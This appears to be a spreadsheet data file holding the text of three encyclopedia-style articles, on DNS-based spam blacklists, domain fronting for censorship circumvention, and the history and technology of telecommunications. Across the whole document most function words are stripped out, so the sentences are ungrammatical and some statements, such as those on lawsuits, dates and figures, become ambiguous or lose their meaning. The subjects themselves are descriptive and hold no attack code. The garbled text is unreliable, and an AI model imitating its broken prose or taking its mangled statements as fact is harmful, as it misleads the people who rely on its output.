carry spam. orbs controversial time many people felt running open relay acceptable, scanning internet open mail servers could abusive. 2003, number dnsbls came denial-of-service attacks (dos). since party admitted attacks discovered responsible, purpose matter speculation. however, many observers believe attacks perpetrated spammers order interfere dnsbls' operation hound shutting down. august 2003, firm osirusoft, operator several dnsbls including based spews data set, shut lists suffering weeks near-continuous attack. technical specifications dnsbls came relatively late rfc5782. dnsbls uniform resource identifier (uri) dnsbl dnsbl lists domain names sometimes also addresses found "clickable" links contained body spams, generally found inside legitimate messages. dnsbls created determined much spam made past spam filters short time frame first spam-sending address point sending address first listed major sending-ip-based dnsbls. many cases, elusive spams contain links domain names addresses (collectively referred uris) already spotted previously caught spam found non-spam e-mail. therefore, spam filter extracts uris message checks dnsbl, spam blocked even sending spam listed sending dnsbl. three major dnsbls, oldest popular surbl. after surbl created, volunteers surbl started second major dnsbl, uribl. 2008, another long-time surbl volunteer started another dnsbl, ivmuri. spamhaus project provides spamhaus domain block list (dbl) describe domains "found spam messages". intended uribl rhsbl, checked domains message's envelope headers domains urls message bodies. unlike uribls, lists domain names, addresses, since spamhaus provides lists addresses. dnsbls often confused rhsbls (right hand side bls). different. dnsbl lists domain names found body message. rhsbl lists domain names used "from" "reply-to" e-mail address. rhsbls debatable effectiveness since many spams either forged "from" addresses "from" addresses containing popular freemail domain names, @gmail.com, @yahoo.com, @hotmail.com dnsbls widely used rhsbls, effective, used majority spam filters. principle operate dnsbl requires three things: domain host under, nameserver domain, list addresses publish. possible serve dnsbl using general-purpose server software. however typically inefficient zones containing large numbers addresses, particularly dnsbls list entire classless inter-domain routing netblocks. large resource consumption using software designed role domain name server, role-specific software applications designed specifically servers role blacklist. hard part operating dnsbl populating addresses. dnsbls intended public usually specific, published policies listing means, must operated accordingly attain sustain public confidence. dnsbl queries when mail server receives connection client, wishes check client dnsbl (let's say, dnsbl.example.net), less following: take client's address—say, 192.168.42.23—and reverse order octets, yielding 23.42.168.192. append dnsbl's domain name: 23.42.168.192.dnsbl.example.net. look name domain name ("a" record). this return either address, indicating client listed; "nxdomain" ("no domain") code, indicating client not. optionally, client listed, look name text record ("txt" record). most dnsbls publish information client listed records.looking address dnsbl thus similar looking reverse-dns. differences dnsbl lookup uses rather "ptr" record type, uses forward domain (such dnsbl.example.net above) rather special reverse domain in-addr.arpa. there informal protocol addresses returned dnsbl queries match. most dnsbls return address 127.0.0.0/8 loopback network. address 127.0.0.2 indicates generic listing. other addresses block indicate something specific listing—that indicates open relay, proxy, spammer-owned host, etc. details 5782. dnsbl dnsbl query (and rhsbl query) fairly straightforward. domain name query prepended list host follows: example.net.dnslist.example.com dnslist.example.com list host example.net queried domain. generally record returned name listed. dnsbl policies different dnsbls different policies. dnsbl policies differ another three fronts: goals. what dnsbl seek list? list open-relay mail servers open proxies—or addresses known send spam—or perhaps addresses belonging isps harbor spammers? nomination. dnsbl discover addresses list? does nominations submitted users? spam-trap addresses honeypots? listing lifetime. long listing last? automatically expired, removed manually? what operator listed host delisted? types addition different types listed entities addresses traditional dnsbls, host domain names rhsbls, uris uribls) wide range semantic variations lists listing means. list maintainers divided issues whether listings seen statements objective fact subjective opinion lists best used. result, definitive taxonomy dnsbls. some names defined (e.g. "yellow" "nobl") varieties widespread names widespread use, recognized many spam control specialists. white list allow list listing affirmative indication essentially absolute trust black list block list listing negative indication essentially absolute distrust grey list most frequently seen word (greylist greylisting) involving dnsbls directly, using temporary deferral mail unfamiliar sources allow development public reputation (such dnsbl listings) discourage speed-focused spamming. occasionally used refer actual dnsbls listings denote distinct non-absolute levels forms trust distrust. yellow list listing indicates source known produce mixture spam non-spam degree makes checking dnsbls sort useless. nobl list listing indicates source believed send spam subjected blacklist testing, quite trusted whitelisted source. usage most message transfer agents (mta) configured absolutely block (less commonly) accept email based dnsbl listing. this oldest usage form dnsbls. depending specific mta, subtle distinctions configuration make list types yellow nobl useful pointless handles multiple dnsbls. drawback using direct dnsbl support mtas sources list require checking dnsbls used relatively little utility caching negative results. cases cause significant slowdown mail delivery. using white, yellow, nobl lists avoid lookups used alleviate mtas. dnsbls used rule based spam analysis software like spamassassin dnsbl rule. each rule specific positive negative weight combined types rules score message. this allows rules whatever criteria available specific software) "whitelist" mail would otherwise rejected dnsbl listing rules. this also problem heavy lookup load useful results, delay mail much scoring makes possible lookups done parallel asynchronously filter checking message rules. possible toolsets blend binary testing weighted rule approaches. first check white lists accept message source white list, bypassing testing mechanisms. technique developed junk email filter uses yellow lists nobl lists mitigate false positives occur routinely using black lists carefully maintained avoid them. some dnsbls created uses filtering email spam, rather demonstration, informational, rhetorical, testing control purposes. examples include false negatives list," "lucky sevens list," "fibonacci's list," various lists encoding geoip information, random selection lists scaled match coverage another list, useful control determining whether list's effects distinguishable random rejections. criticism some end-users organizations concerns regarding concept dnsbls specifics created used. some criticisms include: legitimate emails blocked along spam shared mailservers. when isp's shared mailserver compromised machines sending spam, become listed dnsbl. end-users assigned shared mailserver find emails blocked receiving mailservers using dnsbl. 2016, sorbs system blocking smtp servers telstra australia, australia's largest internet service provider. this surprise time, would thousands computers connected mail server infected zombie type viruses sending spam. effect legitimate emails users telstra australia system. lists dynamic addresses. this type dnsbl lists addresses submitted isps dynamic therefore presumably unsuitable send email directly; end-user supposed isp's mailserver sending email. lists also accidentally include static addresses, legitimately used small-business owners end-users host small email servers. lists include "spam-support operations", maps rbl. spam-support operation site directly send spam, provides commercial services spammers, hosting sites advertised spam. refusal accept mail spam-support operations intended boycott encourage sites cease business spammers, expense inconveniencing non-spammers site spammers. some lists unclear listing criteria delisting happen automatically quickly. dnsbl operators request payment (e.g. uceprotect.net) donation (e.g. sorbs). some many listing/delisting policies found comparison blacklists article. because lists varying methods adding addresses and/or uris, difficult senders configure systems appropriately avoid becoming listed dnsbl. example, uceprotect dnsbl seems list addresses merely validated recipient address established connection, even spam message ever delivered.despite criticisms, people object principle mail-receiving sites able reject undesired mail systematically. person john gilmore, deliberately operates open mail relay. gilmore accuses dnsbl operators violating antitrust law. blow refuse emails legal (though policy, akin "shooting messenger"). million friends gang make blacklist, exercising illegal monopoly power. number parties, electronic frontier foundation peacefire, raised concerns dnsbls isps. joint statement issued group including peacefire addressed "stealth blocking", isps dnsbls spam-blocking techniques without informing clients. lawsuits spammers pursued lawsuits dnsbl operators similar grounds: 2003, emarketersamerica.org filed lawsuit number dnsbl operators florida court. backed spammer eddy marin, company claimed trade organization email marketers dnsbl operators spamhaus spews engaged restraint trade. suit eventually dismissed lack standing. 2006, u.s. court ordered spamhaus $11.7 million damages spammer e360 insight llc. order default judgment, spamhaus, based refused recognize court's jurisdiction defend e360 lawsuit. 2011, decision overturned united states court appeals seventh circuit. also comparison blacklists dnswl email spam notes references external links blacklists curlie blacklist monitor weekly statistics success failure rates specific blacklists create dnsbl tutorial create dnsbl (dns black list)</t>
  </si>
  <si>
    <t>Domain fronting</t>
  </si>
  <si>
    <t>domain fronting technique internet censorship circumvention uses different domain names different communication layers https connection discreetly connect different target domain discernable third parties monitoring requests connections. quirks security certificates, redirect systems content delivery networks (cdns) used 'domain fronts', protection provided https, censors typically unable differentiate circumvention ("domain-fronted") traffic overt non-fronted traffic given domain name. forced either allow traffic domain front—including circumvention traffic—or block domain front entirely, result expensive collateral damage likened "blocking rest internet".domain fronting conform http standards require extension http host header contain domain. large cloud service providers, including amazon google, actively prohibit domain fronting, made "largely non-viable" censorship bypass technique. technical details basis basis domain fronting using different domain names different layers communication servers (that supports multiple target domains; i.e. subject alternative names) large hosting providers content delivery network (cdn). cdns used idiosyncrasies route traffic requests, allows fronting work. obfuscating requests https request, destination domain name appears three relevant places: query, server name indication (sni) extension, https host header. ordinarily domain name listed three places.: domain-fronted https request, domain appears “outside” https request plain text—in request extension—which client wants pretend targeting connection establishment visible censors, covert domain appears “inside”—in https host header, invisible censor https encryption—which would actual target connection.: encryption https hosts header https protocol, circumvention traffic indistinguishable 'legitimate' (non-fronted) traffic. implementations domain fronting supplement https using large content delivery networks (such various large cdns) front domains, relied large parts functionality. block circumvention traffic, censor outright block front domain. blocking popular content delivery networks economically, politically, diplomatically infeasible censors.when telegram blocked april 2018 following court ruling russia isp-blocking cdns telegram used front evade blocks addresses, 15.8 million addresses associated google amazon's blocked collaterally. this resulted large scale network outages major banks, retail chains, numerous websites; manner blocking criticised incompetence. leveraging request forwarding domain fronting works cdns as—when served different domains request—they historically speaking—they were; §disabling) configured automatically fulfil request view/access domain specified hosts header even finding extension different domain. this behaviour universal across hosting providers; services validate domain used different layers http request. variation usual domain fronting technique, known domainless fronting work case, leaves field blank.if request access hosts header domain succeeds, censor third parties monitoring connections, appears internally forwarded request uninteresting page within network; final connection typically monitor. circumvention scenarios, domain hosts header proxy. hosts header domain, proxy, would blocked censor accessed directly; fronting hides address censor allows parties evade blocks access traffic ever reaches front domain specified request extension; cdn's frontend server third-party interaction decrypt hosts header know true destination covert request. possible emulate behaviour host services automatically forward requests, "reflector" application.: general rule, services forward requests customers' domains, arbitrary ones. necessary blocked domains, domain fronting, also hosted large provider innocuous sites using front https requests (for sti).: usage internet censorship circumvention signal signal, secure messaging service, deployed domain fronting builds apps 2016 2018 bypass blocks direct connections servers egypt, oman, qatar united arab emirates. browser anonymity network uses implementation domain fronting called 'meek' official browser bypass blocks network. telegram telegram used amazon services domain front resist attempts block service russia. greatfire greatfire, non-profit assists users circumventing great firewall, used domain fronting point. cyberattacks domain fronting used private, state-sponsored individuals groups cover tracks discreetly launch cyberattacks disseminate malware. cozy bear russian hacker group cozy bear, classed apt29, observed used domain fronting discreetly gain unauthorised access systems pretending legitimate traffic cdns. their technique used meek plugin—developed project anonymity network—to feign detection. disabling endurance domain fronting method censorship circumvention likened expensive collateral damage blocking comes with—as block domain fronting, must block traffic fronts (cdns large providers) design often relied countless services. signal foundation drew analogy block domain fronted site "have block rest internet well."cloudflare disabled domain fronting 2015. april 2018, google amazon disabled domain fronting content delivery services removing idiosyncrasies redirect schemes allowed fronting happen. google broke domain fronting removing ability 'google.com' front domain changing structured. when requested comment said domain fronting "never supported feature" changes made long-planned upgrades. amazon claimed fronting "already handled breach terms service" implemented changes prohibited obfuscation allowed sites masquerade cloudfront domains websites fronts. reactions various publications speculated effort google amazon part pressure russian government communications authority roskomnadzor blocking millions google amazon domains, april 2018 well, telegram using fronts.digital rights advocates commented move undermines peoples ability access transmit information freely securely repressive states.according signal's founder, moxie marlinspike, google management came question whether wanted front sites services entire nation states wanted block domain fronting gained popular attention apps like signal implementing called fronting circumvention tool "now largely non-viable" countries needed. also collateral freedom telex (anti-censorship system) encrypted notes references external links david fifield, chang lan, hynes, percy wegmann, vern paxson, 2015: blocking-resistant communication domain fronting</t>
  </si>
  <si>
    <t>Telecommunications</t>
  </si>
  <si>
    <t>telecommunication transmission information various types technologies wire, radio, optical, electromagnetic systems. origin desire humans communication distance greater feasible human voice, similar scale expediency; thus, slow systems (such postal mail) excluded field. transmission media telecommunication evolved numerous stages technology, beacons visual signals (such smoke signals, semaphore telegraphs, signal flags, optical heliographs), electrical cable electromagnetic radiation, including light. such transmission paths often divided communication channels, afford advantages multiplexing multiple concurrent communication sessions. telecommunication often used plural form. other examples pre-modern long-distance communication included audio messages, coded drumbeats, lung-blown horns, loud whistles. 20th- 21st-century technologies long-distance communication usually involve electrical electromagnetic technologies, telegraph, telephone, television teleprinter, networks, radio, microwave transmission, optical fiber, communications satellites. revolution wireless communication began first decade 20th century pioneering developments radio communications guglielmo marconi, nobel prize physics 1909, notable pioneering inventors developers field electrical electronic telecommunications. these included charles wheatstone samuel morse (inventors telegraph), antonio meucci alexander graham bell (some inventors developers telephone, invention telephone), edwin armstrong forest (inventors radio), well vladimir zworykin, john logie baird philo farnsworth (some inventors television). according article radio regulations (rr), telecommunication defined transmission, emission reception signs, signals, writings, images sounds intelligence nature wire, radio, optical, electromagnetic systems.» this definition identical contained annex constitution convention international telecommunication union (geneva, 1992). early telecommunication networks created copper wires physical medium signal transmission. many years, networks used basic phone services, namely voice telegrams. since mid-1990s, internet grown popularity, voice gradually supplanted data. this soon demonstrated limitations copper data transmission, prompting development optics. etymology word telecommunication compound greek prefix tele- (τῆλε), meaning distant, off, afar, latin communicare, meaning share. modern adapted french, written recorded 1904 french engineer novelist édouard estaunié. communication first used english word late 14th century. comes french comunicacion (14c., modern french communication), latin communicationem (nominative communicatio), noun action past participle stem communicare, share, divide out; communicate, impart, inform; join, unite, participate in," literally, make common," communis." history beacons pigeons homing pigeons used throughout history different cultures. pigeon post persian roots later used romans military. frontinus claimed julius caesar used pigeons messengers conquest gaul. greeks also conveyed names victors olympic games various cities using homing pigeons. early 19th century, dutch government used system java sumatra. 1849, paul julius reuter started pigeon service stock prices aachen brussels, service operated year telegraph link closed.in middle ages, chains beacons commonly used hilltops means relaying signal. beacon chains suffered drawback could pass single information, meaning message "the enemy sighted" agreed upon advance. notable instance spanish armada, beacon chain relayed signal plymouth london.in 1792, claude chappe, french engineer, built first fixed visual telegraphy system semaphore line) lille paris. however semaphore suffered need skilled operators expensive towers intervals thirty kilometres (six nineteen miles). result competition electrical telegraph, last commercial line abandoned 1880. telegraph telephone july 1837, first commercial electrical telegraph demonstrated english inventor william fothergill cooke english scientist charles wheatstone. both inventors viewed device improvement [existing] electromagnetic telegraph" device.samuel morse independently developed version electrical telegraph unsuccessfully demonstrated september 1837. code important advance wheatstone's signaling method. first transatlantic telegraph cable successfully completed july 1866, allowing transatlantic telecommunication first time.the conventional telephone patented alexander bell 1876. elisha gray also filed caveat 1876. gray abandoned caveat contest bell's priority, examiner approved bell's patent march 1876. gray filed caveat variable resistance telephone, bell first document idea test telephone.[88] antonio meucci invented device allowed electrical transmission voice line nearly years 1849, device little practical value relied electrophonic effect requiring users place receiver mouths "hear." first commercial telephone services bell telephone company 1878 1879 sides atlantic cities haven london. radio television 1894, italian inventor guglielmo marconi began developing wireless communication using then-newly discovered phenomenon radio waves, showing 1901 could transmitted across atlantic ocean. this start wireless telegraphy radio. december 1902, transmission marconi station glace bay, nova scotia, canada, became world's first radio message cross atlantic north america. 1904, commercial service established transmit nightly news summaries subscribing ships, incorporated onboard newspapers.world accelerated development radio military communications. after war, commercial radio broadcasting began 1920s became important mass medium entertainment news. world accelerated development radio wartime purposes aircraft land communication, radio navigation, radar. development stereo broadcasting radio began 1930s united states 1970s united kingdom, displacing dominant commercial standard.on march 1925, john logie baird demonstrated transmission moving pictures london department store selfridges. baird's device relied upon nipkow disk thus became known mechanical television. formed basis experimental broadcasts done british broadcasting corporation beginning september 1929. however, 20th century, televisions depended cathode tube invented karl braun. first version television show promise produced philo farnsworth demonstrated family september 1927. after world interrupted experiments resumed television became important home entertainment broadcast medium. thermionic valves type device known thermionic tube thermionic valve uses thermionic emission electrons heated cathode number fundamental electronic functions signal amplification current rectification. simplest vacuum tube, diode invented 1904 john ambrose fleming, contains heated electron-emitting cathode anode. electrons flow direction device—from cathode anode. adding control grids within tube enables current cathode anode controlled voltage grid grids. these devices became component electronic circuits first half 20th century crucial development radio, television, radar, sound recording reproduction, long-distance telephone networks, analogue early digital computers. while applications used earlier technologies spark transmitter radio mechanical computers computing, invention thermionic vacuum tube made technologies widespread practical, leading creation electronics.in 1940s, invention semiconductor devices made possible produce solid-state devices, smaller, cheaper, efficient, reliable, durable thermionic tubes. starting mid-1960s, thermionic tubes replaced transistor. thermionic tubes still applications certain high-frequency amplifiers. computer networks internet september 1940, george stibitz transmitted problems complex number calculator york using teletype received computed results back dartmouth college hampshire. this configuration centralized computer (mainframe) remote dumb terminals remained popular well 1970s. 1960s, researchers started investigate packet switching, technology sends message portions destination asynchronously without passing centralized mainframe. four-node network emerged december 1969, constituting beginnings arpanet, 1981 grown nodes. arpanet eventually merged networks form internet. while internet development focus internet engineering task force (ietf) published series request comments documents, networking advancements occurred industrial laboratories, local area network (lan) developments ethernet (1983) token ring (1984). growth transmission capacity effective capacity exchange information worldwide two-way telecommunication networks grew petabytes (pb) optimally compressed information 1986 1993 exabytes (eb) 2000 2007. this informational equivalent newspaper pages person 1986, entire newspapers person 2007. given growth, telecommunications play increasingly important role world economy global telecommunications industry $4.7 trillion sector 2012. service revenue global telecommunications industry estimated $1.5 trillion 2010, corresponding 2.4% world's gross domestic product (gdp). technical concepts modern telecommunication founded series concepts experienced progressive development refinement period well century: basic elements telecommunication technologies primarily divided wired wireless methods. overall, basic telecommunication system consists three main parts always present form another: transmitter takes information converts signal transmission medium, also called physical channel, carries signal (e.g. "free space channel") receiver takes signal channel converts back usable information recipientin radio broadcasting station, station's large power amplifier transmitter broadcasting antenna interface power amplifier free space channel. free space channel transmission medium receiver's antenna interface free space channel receiver. next, radio receiver destination radio signal, converted electricity sound. telecommunication systems occasionally "duplex" (two-way systems) single electronics working transmitter receiver, transceiver (e.g., mobile phone). transmission electronics receiver electronics within transceiver quite independent another. this explained fact radio transmitters contain power amplifiers operate electrical powers measured watts kilowatts, radio receivers deal radio powers measured microwatts nanowatts. hence, transceivers carefully designed built isolate high-power circuitry low-power circuitry avoid interference. telecommunication fixed lines called point-to-point communication occurs transmitter receiver. telecommunication radio broadcasts called broadcast communication occurs powerful transmitter numerous low-power sensitive radio receivers.telecommunications multiple transmitters multiple receivers designed cooperate share physical channel called multiplex systems. sharing physical channels using multiplexing often results significant cost reduction. multiplexed systems laid telecommunication networks multiplexed signals switched nodes correct destination terminal receiver. analog versus digital communications communications signals sent analog signals digital signals analog communication systems digital communication systems. analog signals vary continuously respect information, digital signals encode information discrete values (e.g., ones zeroes). during propagation reception, information contained analog signals degraded undesirable physical noise. commonly, noise communication system expressed adding subtracting desirable signal random way. this form noise called additive noise, understanding noise negative positive different instances. unless additive noise disturbance exceeds certain threshold, information contained digital signals remain intact. their resistance noise represents advantage digital signals analog signals. however, digital systems fail catastrophically noise exceeds system's ability autocorrect. hand, analog systems fail gracefully: noise increases, signal becomes progressively degraded still usable. also, digital transmission continuous data unavoidably adds quantization noise output. this reduced, entirely eliminated, expense increasing channel bandwidth requirement. communication channels term "channel" different meanings. meaning, channel physical medium carries signal transmitter receiver. examples include atmosphere sound communications, glass optical fibers kinds optical communications, coaxial cables communications voltages electric currents them, free space communications using visible light, infrared waves, ultraviolet light, radio waves. coaxial cable types classified type "radio guide", terminology derived world various designations used classify specific signal transmission applications. this last channel called "free space channel". sending radio waves place another nothing presence absence atmosphere two. radio waves travel perfect vacuum easily travel air, fog, clouds, kind gas. meaning term "channel" telecommunications seen phrase communications channel, subdivision transmission medium used send multiple streams information simultaneously. example, radio station broadcast radio waves free space frequencies neighborhood 94.5 (megahertz) another radio station simultaneously broadcast radio waves frequencies neighborhood 96.1 mhz. each radio station would transmit radio waves frequency bandwidth (kilohertz), centered frequencies above, called "carrier frequencies". each station example separated adjacent stations khz, difference khz) engineering allowance imperfections communication system. example above, "free space channel" divided communications channels according frequencies, channel assigned separate frequency bandwidth broadcast radio waves. this system dividing medium channels according frequency called "frequency-division multiplexing". another term concept "wavelength-division multiplexing", commonly used optical communications multiple transmitters share physical medium. another dividing communications medium channels allocate sender recurring segment time "time slot", example, milliseconds second), allow sender send messages within time slot. this method dividing medium communication channels called "time-division multiplexing" (tdm), used optical fibre communication. some radio communication systems within allocated channel. hence, systems hybrid fdm. modulation shaping signal convey information known modulation. modulation used represent digital message analog waveform. this commonly called "keying"—a term derived older morse code telecommunications—and several keying techniques exist (these include phase-shift keying, frequency-shift keying, amplitude-shift keying). "bluetooth" system, example, uses phase-shift keying exchange information various devices. addition, combinations phase-shift keying amplitude-shift keying called jargon field) "quadrature amplitude modulation" (qam) used high-capacity digital radio communication systems. modulation also used transmit information low-frequency analog signals higher frequencies. this helpful low-frequency analog signals cannot effectively transmitted free space. hence information low-frequency analog signal must impressed higher-frequency signal (known "carrier wave") transmission. there several different modulation schemes available achieve [two basic amplitude modulation (am) frequency modulation (fm)]. example process disc jockey's voice impressed carrier wave using frequency modulation (the voice would received radio channel fm"). addition, modulation advantage frequency division multiplexing (fdm). telecommunication networks telecommunications network collection transmitters, receivers, communications channels send messages another. some digital communications networks contain routers work together transmit information correct user. analog communications network consists switches establish connection users. types networks, repeaters necessary amplify recreate signal transmitted long distances. this combat attenuation render signal indistinguishable noise. another advantage digital systems analog output easier store memory, i.e. voltage states (high low) easier store continuous range states. societal impact telecommunication significant social, cultural economic impact modern society. 2008, estimates placed telecommunication industry's revenue us$4.7 trillion three percent gross world product (official exchange rate). several following sections discuss impact telecommunication society. microeconomics microeconomic scale, companies used telecommunications help build global business empires. this self-evident case online retailer amazon.com but, according academic edward lenert, even conventional retailer walmart benefited better telecommunication infrastructure compared competitors. cities throughout world, home owners telephones order arrange variety home services ranging pizza deliveries electricians. even relatively poor communities noted telecommunication advantage. bangladesh's narsingdi district, isolated villagers cellular phones speak directly wholesalers arrange better price goods. côte d'ivoire, coffee growers share mobile phones follow hourly variations coffee prices sell best price. macroeconomics macroeconomic scale, lars-hendrik röller leonard waverman suggested causal link good telecommunication infrastructure economic growth. dispute existence correlation although argue wrong view relationship causal.because economic benefits good telecommunication infrastructure, increasing worry inequitable access telecommunication services amongst various countries world—this known digital divide. 2003 survey international telecommunication union (itu) revealed roughly third countries fewer mobile subscription every people one-third countries fewer land-line telephone subscription every people. terms internet access, roughly half countries fewer people internet access. from information, well educational data, able compile index measures overall ability citizens access information communication technologies. using measure, sweden, denmark iceland received highest ranking african countries nigeria, burkina faso mali received lowest. social impact telecommunication played significant role social relationships. nevertheless, devices like telephone system originally advertised emphasis practical dimensions device (such ability conduct business order home services) opposed social dimensions. late 1920s 1930s social dimensions device became prominent theme telephone advertisements. promotions started appealing consumers' emotions, stressing importance social conversations staying connected family friends.since role telecommunications played social relations become increasingly important. recent years, popularity social networking sites increased dramatically. these sites allow users communicate well post photographs, events profiles others see. profiles list person's age, interests, sexual preference relationship status. way, sites play important role everything organising social engagements courtship.prior social networking sites, technologies like short message service (sms) telephone also significant impact social interactions. 2000, market research group ipsos mori reported 24-year-old users united kingdom used service coordinate social arrangements flirt. entertainment, news, advertising cultural terms, telecommunication increased public's ability access music film. with television, people watch films seen home without travel video store cinema. with radio internet, people listen music heard without travel music store. telecommunication also transformed people receive news. 2006 survey (right table) slightly 3,000 americans non-profit internet american life project united states majority specified television radio newspapers. telecommunication equally significant impact advertising. media intelligence reported 2007, advertising expenditure united states spent media depend upon telecommunication. regulation many countries enacted legislation conforms international telecommunication regulations established international telecommunication union (itu), "leading agency information communication technology issues". 1947, atlantic city conference, decided "afford international protection frequencies registered international frequency list used conformity radio regulation". according itu's radio regulations adopted atlantic city, frequencies referenced international frequency registration board, examined board registered international frequency list "shall right international protection harmful interference".from global perspective, political debates legislation regarding management telecommunication broadcasting. history broadcasting discusses debates relation balancing conventional communication printing telecommunication radio broadcasting. onset world brought first explosion international broadcasting propaganda. countries, governments, insurgents, terrorists, militiamen used telecommunication broadcasting techniques promote propaganda. patriotic propaganda political movements colonization started mid-1930s. 1936, broadcast propaganda arab world partly counter similar broadcasts italy, also colonial interests north africa.modern insurgents, latest iraq war, often intimidating telephone calls, smss distribution sophisticated videos attack coalition troops within hours operation. "the sunni insurgents even television station, al-zawraa, banned iraqi government, still broadcasts erbil, iraqi kurdistan, even coalition pressure forced switch satellite hosts several times."on november 2014, president obama recommended federal communications commission reclassify broadband internet service telecommunications service preserve neutrality. modern media worldwide equipment sales according data collected gartner technica sales main consumer's telecommunication equipment worldwide millions units was: telephone telephone network, caller connected person wish talk switches various telephone exchanges. switches form electrical connection users setting switches determined electronically caller dials number. once connection made, caller's voice transformed electrical signal using small microphone caller's handset. this electrical signal sent network user transformed back sound small speaker person's handset. 2015, landline telephones residential homes analog—that speaker's voice directly determines signal's voltage. although short-distance calls handled end-to-end analog signals, increasingly telephone service providers transparently converting signals digital signals transmission. advantage digitized voice data travel side side data internet perfectly reproduced long-distance communication opposed analog signals inevitably impacted noise). mobile phones significant impact telephone networks. mobile phone subscriptions outnumber fixed-line subscriptions many markets. sales mobile phones 2005 totalled 816.6 million figure almost equally shared amongst markets asia/pacific (204 western europe (164 cemea (central europe, middle east africa) (153.5 north america (148 latin america (102 terms subscriptions five years 1999, africa outpaced markets 58.2% growth. increasingly phones serviced systems voice content transmitted digitally w-cdma many markets choosing deprecate analog systems amps.there also dramatic changes telephone communication behind scenes. starting operation tat-8 1988, 1990s widespread adoption systems based optical fibers. benefit communicating optical fibers offer drastic increase data capacity. tat-8 able carry times many telephone calls last copper cable laid time today's optical fibre cables able carry times many telephone calls tat-8. this increase data capacity several factors: first, optical fibres physically much smaller competing technologies. second, suffer crosstalk means several hundred easily bundled together single cable. lastly, improvements multiplexing exponential growth data capacity single fibre.assisting communication across many modern optical fibre networks protocol known asynchronous transfer mode (atm). protocol allows side-by-side data transmission mentioned second paragraph. suitable public telephone networks establishes pathway data network associates traffic contract pathway. traffic contract essentially agreement client network network handle data; network cannot meet conditions traffic contract accept connection. this important telephone calls negotiate contract guarantee constant rate, something ensure caller's voice delayed parts completely. there competitors atm, multiprotocol label switching (mpls), perform similar task expected supplant future. radio television broadcast system, central high-powered broadcast tower transmits high-frequency electromagnetic wave numerous low-powered receivers. high-frequency wave sent tower modulated signal containing visual audio information. receiver tuned pick high-frequency wave demodulator used retrieve signal containing visual audio information. broadcast signal either analog (signal varied continuously respect information) digital (information encoded discrete values).the broadcast media industry critical turning point development, many countries moving analog digital broadcasts. this move made possible production cheaper, faster capable integrated circuits. chief advantage digital broadcasts prevent number complaints common traditional analog broadcasts. television, includes elimination problems snowy pictures, ghosting distortion. these occur nature analog transmission, means perturbations noise evident final output. digital transmission overcomes problem digital signals reduced discrete values upon reception hence small perturbations affect final output. simplified example, binary message 1011 transmitted signal amplitudes [1.0 1.0] received signal amplitudes [0.9 0.9] would still decode binary message 1011— perfect reproduction sent. from example, problem digital transmissions also seen noise great enough significantly alter decoded message. using forward error correction receiver correct handful errors resulting message much noise lead incomprehensible output hence breakdown transmission.in digital television broadcasting, three competing standards likely adopted worldwide. these atsc, isdb standards; adoption standards thus presented captioned map. three standards mpeg-2 video compression. atsc uses dolby digital ac-3 audio compression, isdb uses advanced audio coding (mpeg-2 part standard audio compression typically uses mpeg-1 part layer choice modulation also varies schemes. digital audio broadcasting, standards much unified practically countries choosing adopt digital audio broadcasting standard (also known eureka standard). exception united states chosen adopt radio. radio, unlike eureka 147, based upon transmission method known in-band on-channel transmission allows digital information "piggyback" normal analog transmissions.however, despite pending switch digital, analog television remains transmitted countries. exception united states ended analog television transmission low-power stations) june 2009 twice delaying switchover deadline. kenya also ended analog television transmission december 2014 multiple delays. analog television, three standards broadcasting color (see adoption here). these known (german designed), ntsc (american designed), secam (french-designed). analog radio, switch digital radio made difficult higher cost digital receivers. choice modulation analog radio typically amplitude (am) frequency modulation (fm). achieve stereo playback, amplitude modulated subcarrier used stereo quadrature amplitude modulation used stereo c-quam. internet internet worldwide network computers computer networks communicate using internet protocol (ip). computer internet unique address used computers route information hence, computer internet send message computer using address. these messages carry originating computer's address allowing two-way communication. internet thus exchange messages computers.it estimated information flowing two-way telecommunications networks year 2000 flowing internet (most rest (42%) landline telephone). 2007 internet clearly dominated captured information telecommunication networks (most rest (2%) mobile phones). 2008, estimated 21.9% world population access internet highest access rates (measured percentage population) north america (73.6%), oceania/australia (59.5%) europe (48.1%). terms broadband access, iceland (26.7%), south korea (25.4%) netherlands (25.3%) world.the internet works part protocols govern computers routers communicate other. nature computer network communication lends layered approach individual protocols protocol stack more-or-less independently protocols. this allows lower-level protocols customized network situation changing higher-level protocols operate. practical example important allows internet browser code regardless whether computer running connected internet ethernet wi-fi connection. protocols often talked terms place reference model (pictured right), emerged 1983 first step unsuccessful attempt build universally adopted networking protocol suite.for internet, physical medium data link protocol vary several times packets traverse globe. this internet places constraints physical medium data link protocol used. this leads adoption media protocols best suit local network situation. practice, intercontinental communication asynchronous transfer mode (atm) protocol modern equivalent) optic fiber. this intercontinental communication internet shares infrastructure public switched telephone network. network layer, things become standardized internet protocol (ip) adopted logical addressing. world wide web, addresses" derived human-readable form using domain name system (e.g. 72.14.207.99 derived www.google.com). moment, widely used version internet protocol version four move version imminent.at transport layer, communication adopts either transmission control protocol (tcp) user datagram protocol (udp). used essential every message sent received computer whereas used merely desirable. with tcp, packets retransmitted lost placed order presented higher layers. with udp, packets ordered retransmitted lost. both packets carry port numbers specify application process packet handled because certain application-level protocols certain ports, network administrators manipulate traffic suit particular requirements. examples restrict internet access blocking traffic destined particular port affect performance certain applications assigning priority. above transport layer, certain protocols sometimes used loosely session presentation layers, notably secure sockets layer (ssl) transport layer security (tls) protocols. these protocols ensure data transferred parties remains completely confidential. finally, application layer, many protocols internet users would familiar http (web browsing), pop3 (e-mail), (file transfer), (internet chat), bittorrent (file sharing) xmpp (instant messaging). voice internet protocol (voip) allows data packets used synchronous voice communications. data packets marked voice type packets prioritized network administrators real-time, synchronous conversation less subject contention types data traffic delayed (i.e. file transfer email) buffered advance (i.e. audio video) without detriment. that prioritization fine network sufficient capacity voip calls taking place time network enabled prioritization i.e. private corporate-style network, internet generally managed difference quality voip calls private network public internet. local area networks wide area networks despite growth internet, characteristics local area networks (lans)—computer networks extend beyond kilometres—remain distinct. this networks scale require features associated larger networks often cost-effective efficient without them. when connected internet, also advantages privacy security. however, purposefully lacking direct connection internet provide assured protection hackers, military forces, economic powers. these threats exist methods connecting remotely lan. wide area networks (wans) private computer networks extend thousands kilometres. once again, advantages include privacy security. prime users private lans wans include armed forces intelligence agencies must keep information secure secret. mid-1980s, several sets communication protocols emerged fill gaps data-link layer application layer reference model. these included appletalk, ipx, netbios dominant protocol early 1990s popularity ms-dos users. tcp/ip existed point, typically used large government research facilities.as internet grew popularity traffic required routed private networks, tcp/ip protocols replaced existing local area network technologies. additional technologies, dhcp, allowed tcp/ip-based computers 